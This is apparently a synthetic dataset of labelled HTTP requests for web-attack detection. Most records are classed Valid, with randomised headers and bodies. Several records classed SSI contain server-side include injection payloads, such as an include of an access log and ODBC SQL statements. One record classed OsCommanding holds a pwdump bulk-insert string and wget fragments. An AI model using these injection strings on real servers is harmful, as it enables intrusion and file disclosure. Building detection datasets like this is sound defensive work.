Warning: 029 127.20.136.35 "dl4wautaiaocAelifw" 
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19204
Start - Id: 7151
class: Valid
POST /NYhsYftpZt1UhPv/b0P26ly2F/3allJcopytmiQN/4tndos5neeniteee/fPvutqIwuT@ihk/af4Ol7nnndk/kcSCEce6E1VY-.asp? HTTP/1.0
Content-Length: 211
Content-Language: htsrFi,ps4
Content-Encoding: identity
Content-Location: /awOeet/eewtoi3/iemail/oveeeueu/onchaN.cgi
Content-MD5: ZXEzb21mZTltYUFSdGVBbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Oct 09 06:15:20 CET
Last-Modified: Sat, 17 Jul 04 12:37:57 UTC
Host: 93.216.34.248
Connection: close
Accept: audio/basic
Accept-Charset: iso-10646-ucs-2, windows-1254;q=0.0, iso-8859-2, iso-8859-15, isiri-3342
Accept-Encoding: 
Accept-Language: rgtt-13imk;q=0.7, Zoee-9h2Es2, jwElt-snuue
Cache-Control: no-store
Client-ip: 6.234.171.35
Cookie: 4dnSdlinudd=onst;ar2afnSlLledotm=xa;uhdl4aEcsznhnnQ=nlztiIboot.inijz;on5qa;pmhyooeia=@ro-2\erzOosrbu;ighjio=3soltb
Cookie2: $Version="8"
Date: Sat, 17 Jun 06 10:54:26 UTC
ETag: W/"RivLDL4hE_xM22g38l"
Expect: 100-continue
From: ohayn@eeaecasg.biz
If-Modified-Since: Sun, 03 Apr 05 13:55:01 CET
If-Unmodified-Since: Wed, 06 Jul 05 03:44:58 CET
If-Match: *
If-None-Match: *
If-Range: "FgpUL_13bSQ0vq06"
Max-Forwards: 5228
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest nc=063b82cf
Authorization: Digest qop=auth-int
Range: 8-880,5697-50697,95-
Referer: http://Tein.de/lddtAa.conf
TE: trailers,trailers
Trailer: Pragma
User-Agent: uotiehgeNw/8.7.3.4
UA-CPU: MIPS
UA-Disp: 1964,0580,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 849x6253
Via: HTTP/1.1 154.33.77.189
Transfer-Encoding: deflate
Upgrade: ecs3ms/8.7, i206fu/9.3, stsan/9.3
Warning: 252 131.157.16.66 "nmoie" 
X-Forwarded-For: 229.243.169.191
X-Serial-Number: 73109423646427331
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fepn7=rHoqY&NEF7copyQSgAHmG=ft&bthzqnrtniTn=4894&zn6eeswkz0=tbdS&usp0odatn=ihgmoRoEi4e9dt&zbaao3bM=2915&otnjdrejmkrnl=056849&tniunm1ghN=009282&lTndp=<Aorm9gnetcatn n~h&eehG4=7Ofd4g70FINm&ttknvgeltadaera=7602

End - Id: 7151
Start - Id: 15422
class: Valid
GET /bsoxh5m5jnt/Ebgsoundwindow.openiFJKh/Noasao2ot/eiaiGsstf/ytu/ereeonif9/shmliahawoist/EetArksXp1Tl5i.msf?aneat=1rd7do&tsD=cta+%2B9Er&thu=tf&log7kh9=c%5Cb8uautoexecf&4cuMih=6932&rw=te&elbn1signstth=qJoV.oJB&h4aijiss=9%2B3eesabgcexp3&tdr=697&senliiwvyo=sed4oact&1rrbmrOKajh=eF1&a3bctuhj3hreh=oedocumentuT&GZPgwE4da@n=22 HTTP/1.1
Host: 42.100.171.165
Connection: keep-alive
Accept: text/*;q=0.3, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: rFeotse-Bd0hdahe, cs-tcgok9ot, oe-a8nrD;q=0.9, er1-i2ft
Cache-Control: min-fresh=529
Client-ip: 152.20.138.118
Cookie: iii3nesxs1=evarr(;gGXscript=n@azys;ixnwaRtekate=6am e1dt>ey=yr;eyaea=sn6g
Cookie2: $Version="6"
Date: Mon, 18 Sep 06 11:54:58 UTC
ETag: W/"-FNt8ATarocCRF3"
Expect: 100-continue
From: hreEo@mhtthLrava.org
If-Modified-Since: Tue, 12 Feb 08 15:48:10 CET
If-Unmodified-Since: Thu, 27 Jul 06 20:38:49 GMT
If-Match: "m-R5rsZDs6.Nu37w"
If-None-Match: *
If-Range: "yPq@lZN7AIjujWZR"
Max-Forwards: 98
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="noelihmo"
Authorization: NTLM YWl5dHJFb2J0OWVUc2lhYXJldG9xOU9lZ1RlaGU2b1NvdG5lcWF0ZQ==
Range: -590219
Referer: http://spoagSh.com/hse5ot4/csngoie/0iwaer5.aspx
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 2.2; bx-dw; rv:6.0.3) Gecko/15989373
UA-CPU: x86
UA-Disp: 842,1582,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 743x937
Via: 0.4 188.145.189.223:79, 9.5 www.fukSsNN3.tiff, 8.8 98.119.165.74:06
Transfer-Encoding: compress
Upgrade: ncaer/8.0, rbkq/6.1, eos/1.0, ckiws/1.2, 6ln76s/2.0
Warning: 464 www.mnaweo.js "oneuxm" "Sat, 24 Jan 04 18:49:21 UTC"
X-Forwarded-For: 198.220.179.151
X-Serial-Number: 24141
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15422
Start - Id: 39638
class: SSI
GET /seo4r9/eViC/bj9@-1POav/r5na95wb4.sh?r3=Qj&KrorEuwutoRm=8dN&eMii7egg1en=38&gEkoxnlct=eoxp_i&eeOIshdw=%3C%21--++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&h9e3zepThhi8t=allsS&HEwh6nyc=lsesXDr HTTP/1.1
Host: 21.245.206.129
Connection: keep-alive
Accept: audio/x-wav;q=0.5, text/html
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: R-hNi, asudt-he;q=0.1, tatshd-aA;q=0.8, oTep-m2m, bwi-AatQm;q=0.5
Cache-Control: min-fresh=799
Client-ip: 96.129.208.142
Cookie: 2bgsound3Ppc0lRx.=rr;kiosOyvDepog=Af77akm
Cookie2: $Version="2"
Date: Wed, 02 Dec 09 01:16:47 UTC
ETag: W/"vYrhlBgxRcANvEX21"
Expect: irarnre
From: ae07on@oist3.org
If-Modified-Since: Sun, 11 Nov 07 23:43:13 GMT
If-Unmodified-Since: Tue, 14 Sep 04 02:11:09 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: *
If-Range: Mon, 02 Feb 04 02:34:24 UTC
Max-Forwards: 91
MIME-Version: 9.0
Pragma: efer04=sm
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: fghanl oe3trsY=ir5aeq
Range: -3
Referer: /esnundd/nesdw/eqhytg/r3icey/xavao.jsp
TE: trailers,trailers
Trailer: Authorization
User-Agent: moHnn/7.6
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 3.3 www.4nva.shtml, aocias/0.5 208.21.81.107
Transfer-Encoding: identity
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39638
Start - Id: 33502
class: Valid
POST /uooxteepl/X7W2/vnuunrLyc/n8Y/UG0gtcat/r_wz47uiIAs/4ks9ush6zS-HH09Y/o3k.jsp? HTTP/1.0
Content-Length: 27
Content-Language: ostrtif,Eshbld,iti
Content-Encoding: deflate
Content-Location: /emi1o/Tuet/ezei.mspx
Content-MD5: YWZuY2xhdWxscWVjc2VtaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Apr 09 17:03:00 UTC
Last-Modified: Thu, 29 Dec 05 21:39:26 CET
Host: www.3eoAioe.st
Connection: idedn9r1
Accept: */*
Accept-Charset: iso-2022-jp;q=0.5, iso-8859-9;q=0.2, x-mac-chinesetrad;q=0.4, iso-8859-5;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 128.216.80.220
Cookie: oietynhavnpaner=il.zM7_R;cAT1=bun%iopengx:ee;.eCfp3w=+;fatrTmroo=41453091;NxQm2X7andvmfbgsound=D e;il7rht1atpl0=5028
Cookie2: $Version="73"
Date: Thu, 24 Aug 06 24:05:11 UTC
If-Modified-Since: Tue, 11 May 04 01:58:11 UTC
If-Unmodified-Since: Fri, 17 Mar 06 17:34:06 CET
If-Match: "XfjUomKc4JL-dpE"
If-None-Match: "6Y5O6@pif@Qj2k7w"
If-Range: Fri, 22 Sep 06 11:27:28 GMT
Max-Forwards: 3
MIME-Version: 8.2
Pragma: znvos='xuycU2i'
Authorization: Basic aGk2YTNyaGQ6aXR0VGRp
Range: 414-03876
Referer: http://s0uedhg.cz/fhmr/athqiau/nr3eett.php4
Trailer: Accept
User-Agent: 6oIev0Uoafno
UA-Color: color8
Via: 5.4 102.47.1.110:30727
Transfer-Encoding: identity
Upgrade: ailrtn/7.9, eolg/6.0, emt/1.6
Warning: 182 www.8seeoaet.gif:8 "Oi4esseIne" 
X-Serial-Number: 81792938956
----: --------------------------------------

rrqhOea=e8r&sie1=sAJYqhYHId

End - Id: 33502
Start - Id: 40824
class: SSI
GET /reol/14GS.css?sidhiltrke8v=%3C%21--%23odbc+++connect%3D%22s7uc8r%2COowI7%2CeatYV%22++statement%3D%22select++*+from+++++n3ut%22--%3E&zWnqCDwSgF=3R-q8Gu&cnteoho2enu=0ad7pe HTTP/1.1
Host: 244.152.69.103:80
Connection: close
Accept: application/*;q=0.3, text/xml;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: eyduud-cloybg;q=0.1, aq-yei;q=0.0, ste-ksewrtn;q=0.7, brh-ds3srtym;q=0.0, nuass-ag;q=0.4
Cache-Control: no-cache
Client-ip: 194.176.168.208
Cookie: hnoderZEinputBi=abR
Cookie2: $Version="76"
Date: Mon, 06 Nov 06 09:07:07 GMT
ETag: W/"qdz019m0zJXAq1Na"
Expect: 100-continue
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Thu, 14 Dec 06 16:15:58 CET
If-Match: "TrZaYg5._f@ouFd1lMcE"
If-None-Match: "P2-Y0J4hajwZASxVXA."
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 8649
MIME-Version: 5.2
Pragma: t=iIand
Proxy-Authorization: es08e taeiRD8d=u4req1e
Authorization: hbi8 deEnscr=trIi7a
Range: 90-,846222-
Referer: http://www.qEOee.biz/tBaE/et1i/aes3ss/Fer9koin.exe
TE: chunked;q=0.7,chunked,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (X11; U; Linux i386 6.7; ae-Sa; rv:8.0.9) Gecko/05116139
UA-CPU: PowerPC
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 477x827
Via: 7.5 255.143.60.94:807
Transfer-Encoding: identity
Upgrade: isxfke/0.8, eth/7.0, crAtot/2.8, Phcxds/0.7
Warning: 601 42.121.7.112:3 "rlcreLunhecrNsee" 
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40824
Start - Id: 40759
class: SSI
POST /elEilaigbephe/bB5.havingv_e9Mi@gE/eTUc54t9iZFJJB3UtDDD/tsTp5fke/koj8nr6TcexosdMyhar/emHvsikachtbe/gYm2rtFjVlOY/nulX3GKgwamZv6-F/vRnl0LpUIEImnetcat/wIDwatwip8lQKK1B_4tZ/rRP/log4processing-instruction.bin? HTTP/1.1
Content-Length: 380
Content-Language: ujbo,hsai1lth,ihail
Content-Encoding: gzip
Content-Location: http://netago9l.gov/rtnhed6R/ikau.pl
Content-MD5: dGFpcnFmbHQ3Z2ZSdzl0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Mar 07 06:23:14 CET
Last-Modified: Tue, 31 Jan 06 22:52:31 UTC
Host: 228.178.225.230
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.6, gzip
Accept-Language: d3-5hUceu, f-e, eeoue-dpizsH;q=0.5
Cache-Control: no-cache
Client-ip: 166.41.33.129
Cookie: ihab8=atewerl4nrodos7scf;18dnp9a=tdazDzmlDGD;iIbeeyo=awgse8sh;taibnoml=7795183019;oNd1yioawod=tit;rpfoa=mbody
Cookie2: $Version="570"
Date: Tue, 08 Jun 04 23:55:49 GMT
ETag: W/"StD9lTanH-1yt1o"
Expect: 100-continue
From: udrrhl@hosiFeige.gov
If-Modified-Since: Wed, 18 May 05 21:34:40 CET
If-Unmodified-Since: Fri, 14 Mar 08 23:03:28 GMT
If-Match: *
If-None-Match: "kqtHaqiIYu5K5uLb@f"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.0
Pragma: a=rwagdaok
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Digest username="etfji"
Range: 21211-
Referer: http://EnUeocL.it/or6egsnU/blntv/khoimoO/cordlh.mpeg
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: Mozilla/6.8 (X11; U; SunOS sun4u 5.0; ty-ht; rv:6.5.2) Gecko/20710323
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: urtex/7.8 www.Sib1r.html, 3.6 70.226.250.186:394, 0.7 www.uhy2dur.gif
Transfer-Encoding: aepo; dote=yhrmrgd
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

aeSorru72ty=<!--#odbc   statement    = "select  5t,     ku8hre,  ehzgiI   from oiHnshRanf    order   by  3,   31,  5"    -->&ilwlcOe3i=ccs(Ya&jloTBHSotws3isn=0t2&uo0a=ehpGlA@byk&lBeiryeq=e&fr=qlb-toEn) 0%uscpP&lv3nht=osyvar?at&7rrtastuqe6sz=0&yhglmabsyEuiu17=176&uTHebC64=d2Aa5T2h3&naosn=9045204&nTebusn7htatrec=copyhaexyleoponx&ahooht0ppp6Eset= hn

End - Id: 40759
Start - Id: 36397
class: OsCommanding
POST /tRwnynnss/e@9Xq/eeokrbethv45os/oprm/-OP3Pc/cvfoKgz5ZVkOxHS3az/aFTn6UWQNLyp/raThxnPaaer/JecO0iekeSEdgonsolO.tiff? HTTP/1.1
Content-Length: 392
Content-Language: tb,ceaso
Content-Encoding: deflate
Content-Location: /ceodH3/REooet/F8hos/O7wiT.cfm
Content-MD5: NGwxOGU3MXRvcm9zYXhtZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Oct 06 07:12:18 UTC
Last-Modified: Tue, 04 May 04 19:05:06 UTC
Host: 115.207.255.204
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-1;q=0.9, cp-932;q=0.8, cp-932, us-ascii;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: Ita=emon
Cookie2: $Version="9"
Date: Sat, 15 Dec 07 16:20:09 GMT
If-Match: "Hh6PEtF.K1C-NUfURhS"
Max-Forwards: 839
MIME-Version: 0.3
Proxy-Authorization: teg9e t2n7ead=tedeel
Authorization: Basic cm5zYzpsajNldDJuMg==
Range: 57553-
Referer: http://www.aIsbeand.st/norh/oet9aFag/yshdrn.png
TE: gzip;q=0.6
User-Agent: tpnay/7.0.3
Via: HTTP/9.4 202.84.251.220, 0.3 69.98.252.15:04864, 4.1 103.110.81.229
Transfer-Encoding: gzip

fh=1&icmhyq2=mdgI5)tehn oy=t&rriebNinnib=1968625&1rnHCW=48671522&Tghtjtwej=n itqerewget$riImo&di4Ilu=mb868NPX1&c0hwfedadanp=69224&ssosc=bulk   insert grnF9    from   'pwdump.exe'         with (codepage='RAW'    )&.OT_JODZwqr@=jBTHLqcXEjb&Ail1GEW=rnmo&9~ e&passwdbrneh)s&hieqnwpiazrcgj=ipeRvotnlHeaita&LbmxM=sMUV4&hbgm=987&eaRIhNnho=eReb&EMUUm2E3-mvB=pj?tpusystem

End - Id: 36397
Start - Id: 12307
class: Valid
GET /tR/snihAuoUnoiR9rmfcSen/zCcOydYOsIjwWMbdRix/ssnvLiefadMsaid/oun6nve8s/uyeTifltkew.exe? HTTP/1.1
Host: 172.98.16.133
Connection: tnoet
Accept: audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: atds=n
Client-ip: 49.9.133.115
Cookie: aiOtpRbilwgy=seet$rn
Cookie2: $Version="74"
Date: Wed, 17 Jun 09 13:00:42 CET
ETag: W/"SZGQ7AQZHX4mSFOS"
Expect: 100-continue
From: iman0m@blrqt7ti.gov
If-Modified-Since: Wed, 15 Aug 07 02:09:44 UTC
If-Unmodified-Since: Sun, 30 May 04 04:20:45 UTC
If-Match: *
If-None-Match: "9uT_@2x2G09RFU1hW5"
If-Range: Fri, 30 Dec 05 21:02:42 UTC
Max-Forwards: 365
MIME-Version: 2.7
Pragma: tt=IhRoae
Proxy-Authorization: Basic ZWZoSHAyYzpkbjh5ZTh5eA==
Authorization: Digest nonce
Range: 825826-,0906-,1304-02
Referer: /ipknte/lysd/htaaee/suoebF/ahrpu.tar.gz
TE: trailers
Trailer: Host
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 4.1; dh-ti; rv:3.2.8) Gecko/23408118
UA-CPU: 68000
UA-Disp: 1104,1931,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4392x5610
Via: 5.8 199.127.195.100:19, e1eGsw/2.4 www.otrdeOye.htm, ub9/9.3 www.Ruoduwta.jpeg
Transfer-Encoding: gzip
Upgrade: lwuepe/6.4, pao/4.1
Warning: 542 www.ouhyte.jpeg "Gsrfo4dsrHenieOoa" 
X-Forwarded-For: 197.212.170.255
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12307
Start - Id: 34046
class: Valid
PUT /rallEW.js? HTTP/1.1
Content-Length: 286
Content-Language: 2nOsieen
Content-Encoding: gzip
Content-Location: http://te4aS.cz/ndnt.png
Content-MD5: aW13OE50ZWdud2hhTkFwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Feb 04 05:17:48 UTC
Last-Modified: Sat, 15 Aug 09 14:58:58 CET
Host: 51.38.5.168
Connection: Beepges
Accept: text/*
Accept-Charset: koi8-r;q=0.0, windows-1258;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.120.65.212
Cookie: nts5o=7305790
Cookie2: $Version="329"
Date: Fri, 05 Jun 09 03:46:03 GMT
ETag: "KHckGgMH_7fBEa2n"
Expect: ipreTti
From: nfaArT@c8eeenfHb.org
If-Modified-Since: Tue, 22 Mar 05 13:59:42 GMT
If-Unmodified-Since: Sun, 05 Feb 06 13:22:36 UTC
If-Match: "cvGz8eu@HdHZ_TNAwS"
If-None-Match: *
If-Range: Wed, 19 Aug 09 19:33:06 CET
Max-Forwards: 3
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic bTZ0ZXJwb3M6dm5jbg==
Range: -392171,25-4387,56097-36321
Referer: /eghEeoc.jsp
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: ehiax/8.5.4.3.0
UA-CPU: PowerPC
UA-Disp: 2533,0787,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 682x2942
Via: FTP/8.7 100.60.63.143, 1.7 www.mSeiseu.html, 2tvdj3/8.3 www.9nse.png:8963
Transfer-Encoding: deflate
Upgrade: eheps/1.6, k8an/6.2, gmti/1.1, Il76oa/5.8
Warning: 786 www.n2xtrct.html "oNtzTur" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 14296843524
----: ----------------------------
~~~~~: ~~~~~~~~~~

mltm5dEpq=25039&9cTmda=iJpscel;)]&OpHRUAIrWL2i=48700282&SBwK@A=877824577&mEaqnshe6=112200716&7nse=msqQtyomwbodi78i&42bu7twr=[wn&iwfrespmfoeoa=2853&Ym3Z5OYUtmp=Kinemdelete&jth=boot.inis&helamt6miB=eiande&etatoa6=dit&1oojUyrsn92626l=eoY&6eosD1jqseagect=119826028&ESearV=dgeHhrsnhi

End - Id: 34046
Start - Id: 23718
class: Valid
GET /tsaon4rt/cnmirEiGsLy1abe/vgcP@660flJnyCoFC/1FallgNWprocessing-instruction/aVC.pl?dgeona3tJmnbao=uoy9&IR-H=ohf&trl=uneasasTe&eDac=0183&0wsts=tlanbna6e&niiqrtD5on=oN7Vh9&etishsvh6ri=tunion%3Ee9+ph8Jssamryhsv&taysthshRtkee=2&fJaDi=uioshr%25u5un&tdghpcodipcdhs=c9oiBIDAqh&qHWtelnet_qHO@=wp-eOn%3AhawhereuesqlTzfj6be&TQ5owE@Hposition=eUpi3&RZ=91050&eee=3&upUU=%25u++z HTTP/1.0
Host: www.slEbdwi.be
Connection: close
Accept: application/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 232.149.111.235
Cookie: oOphiizl=097
Cookie2: $Version="51"
Date: Tue, 05 Apr 05 08:55:04 UTC
ETag: W/"kb6e.IR6Q_h9Bn7yJ2"
Expect: jl0ss=mdssnhte
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Mon, 19 Nov 07 13:50:06 UTC
If-Unmodified-Since: Mon, 12 Feb 07 21:59:08 CET
If-Match: *
If-None-Match: "qQDQ4FWFHrb3rYd"
If-Range: "gWql2ibHkLDyo8CS"
Max-Forwards: 310
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: ingo2N 9riaNhss=yUstnyi
Range: -3122,1516-9936
Referer: http://yratelq.de/Sani/qRfoEln.mp3
TE: deflate;q=0.3,chunked
Trailer: If-None-Match
User-Agent: luswbtroc/0.7.0
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: 8.2 184.157.47.222
Transfer-Encoding: gzip
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23718
Start - Id: 15376
class: Valid
GET /clcbDzcVP45oF/6T/aetqeIied/jlWKSoyu5/4VWucmdO8DHaeval4/3.NybinewhereEsystemfpositionJQ.js?41n2ae6Est=39&yRlsnea=aaL&yJ9gfwda=nopeaenoOe&eihsii=-a HTTP/1.1
Host: 56.71.113.65:80
Connection: keep-alive
Accept: video/mpeg, video/quicktime
Accept-Charset: windows-1257, x-mac-cyrillic;q=0.6, koi8, iso-10646-ucs-2
Accept-Encoding: deflate
Accept-Language: tuna-Eh;q=0.0, tua-mer, owtw6-eNn;q=0.5
Cache-Control: max-stale=7
Client-ip: 63.112.220.104
Cookie: 9binDjD2=nLp9q.s;rtai=document\1;tearbxhHi=9999540002;ehufifeWTtll=te
Cookie2: $Version="5"
Date: Fri, 28 Jan 05 23:40:41 CET
ETag: W/"K32uOEH0nFv5TDh"
Expect: o6arfhht=Mcornn;iUcnwb
From: geinl@l3cifnrd43.fr
If-Modified-Since: Fri, 16 Nov 07 17:48:24 GMT
If-Unmodified-Since: Tue, 05 Sep 06 19:41:37 GMT
If-Match: *
If-None-Match: "LGbxyHmI-WusUnTmv"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bmVpc25hZGU6MHRzZ3Nv
Authorization: Digest qop=auth-int
Range: 41-,07174-
Referer: /Ohet/ckoekfki/ca2rtrea/oerih.msf
TE: gzip,deflate;q=0.4,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 2.3; s6-1d; rv:8.3.9) Gecko/08483371
UA-CPU: x86
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: 6.5 76.51.167.187:4, 3.7 www.ollj.jpeg, HTTP/8.9 www.abs7ee.html
Transfer-Encoding: compress
Upgrade: o0onr/9.5
Warning: 110 199.172.130.251 "3ahnwUsse4t" "Tue, 14 Jun 05 17:49:50 GMT"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15376
Start - Id: 2619
class: Valid
GET /cBz17wqf/3kutraNeikhaIttrlAnj.php3?ohacsn9nnepe=37852&dse=91183893&ioaO9heectir=56&gee1ntoi=snn+fvarb&adh1tce55ccs2=r%3C&feebont=ydsaiiap&basq=cogrteSuie HTTP/1.1
Host: 200.196.65.92
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: a3-dtioi;q=0.8, fR32w6ei-ols, b-2rNoueo, iosesh-Yl
Cache-Control: no-cache
Client-ip: 57.187.217.120
Cookie: 6Ond6atfcre=mailcn<;heNmnq=rihEe)qct;5n8_ZM7tFin=8
Cookie2: $Version="359"
Date: Tue, 05 Jan 10 12:15:14 UTC
ETag: "Q-eSxUs2supfHmruUeEP"
Expect: eorh=hOsit5;eeeed
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Thu, 21 Feb 08 23:32:39 CET
If-Unmodified-Since: Mon, 21 Nov 05 05:40:05 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 16 May 06 06:14:58 GMT
Max-Forwards: 52
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: aritxe roeohce=yskva
Authorization: NTLM ZXVhYW9ueGhlaWxubDRyaWxoeXR5aGVTcnNhUm9hM2l0c2lhdFVv
Range: -4867,365974-
Referer: /20bp/emcapt.msf
TE: trailers,gzip;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/4.8 (X11; U; Linux i386 7.1; rN-ee; rv:7.3.1) Gecko/34142719
UA-CPU: 68000
UA-Disp: 0571,660,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 9.1 72.48.195.24, 4.5 178.248.80.207
Transfer-Encoding: gzip
Upgrade: riwd/2.7
Warning: 490 www.edeoica.css "irieceeHr1udvocili" "Sat, 01 Apr 06 08:34:39 GMT"
X-Forwarded-For: 35.160.78.10
X-Serial-Number: 93836
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2619
Start - Id: 7363
class: Valid
PUT /eaYqY2iqJ8XVQST/s2eeeulmEy98bd5u/txrNis4eaeia/trcetneRecooslihaoi/yRnr.cgi? HTTP/1.1
Content-Length: 174
Content-Language: re,1neg,iutoFW
Content-Encoding: identity
Content-Location: http://xhmijoa.biz/oi5Snuad.php
Content-MD5: ZWFjbm50d2kwbmFvSW9ucw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jan 08 22:24:20 CET
Last-Modified: Fri, 29 Feb 08 03:25:22 CET
Host: 138.170.165.237
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp, koi8;q=0.0, gb2312, windows-1255
Accept-Encoding: compress, compress;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 40.118.223.19
Cookie: fHbtu.Uall8= go2;Hr=gse+se2ewm9d;em=nn2o;sovhyases5h4z=uu'jae;Mea=90195
Cookie2: $Version="532"
Date: Thu, 24 Jan 08 10:47:39 UTC
ETag: "4n1OEXxdHpCrGn1"
Expect: 100-continue
From: toboche@ata6xsirt.st
If-Modified-Since: Fri, 06 Oct 06 22:30:56 GMT
If-Unmodified-Since: Sat, 08 Mar 08 05:42:24 GMT
If-Match: "MlSThO9xB1D5ejuohb-V"
If-None-Match: *
If-Range: *
Max-Forwards: 16
MIME-Version: 3.6
Pragma: 5tel1uBe=onll
Proxy-Authorization: NTLM ZWVzYThlc2ljcnR6YmdzMG50ZTNjdXA5b2V3bmVqcnR5
Authorization: NTLM ZWVyYWFzenRvN3p5b2VoVGt1ZHJuaWdFb2RycGJFbXJo
Range: -38,928255-,664-
Referer: /serc/onmaao/ertct/Dietne.css
TE: gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.1 (Machintosh; U; PPC Mac OS X 8.3; ws-gf; rv:3.8.5) Gecko/77169277
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 850x401
Via: FTP/1.3 www.edNnad.gif:39, 6.6 164.45.16.91, HTTP/4.9 www.8P7rs.htm
Transfer-Encoding: gzip
Upgrade: srQerl/7.9, isie/5.1, aiS/9.5, sii/2.7, zeni/6.9
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 199.98.82.192
X-Serial-Number: 33978029627174385263
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

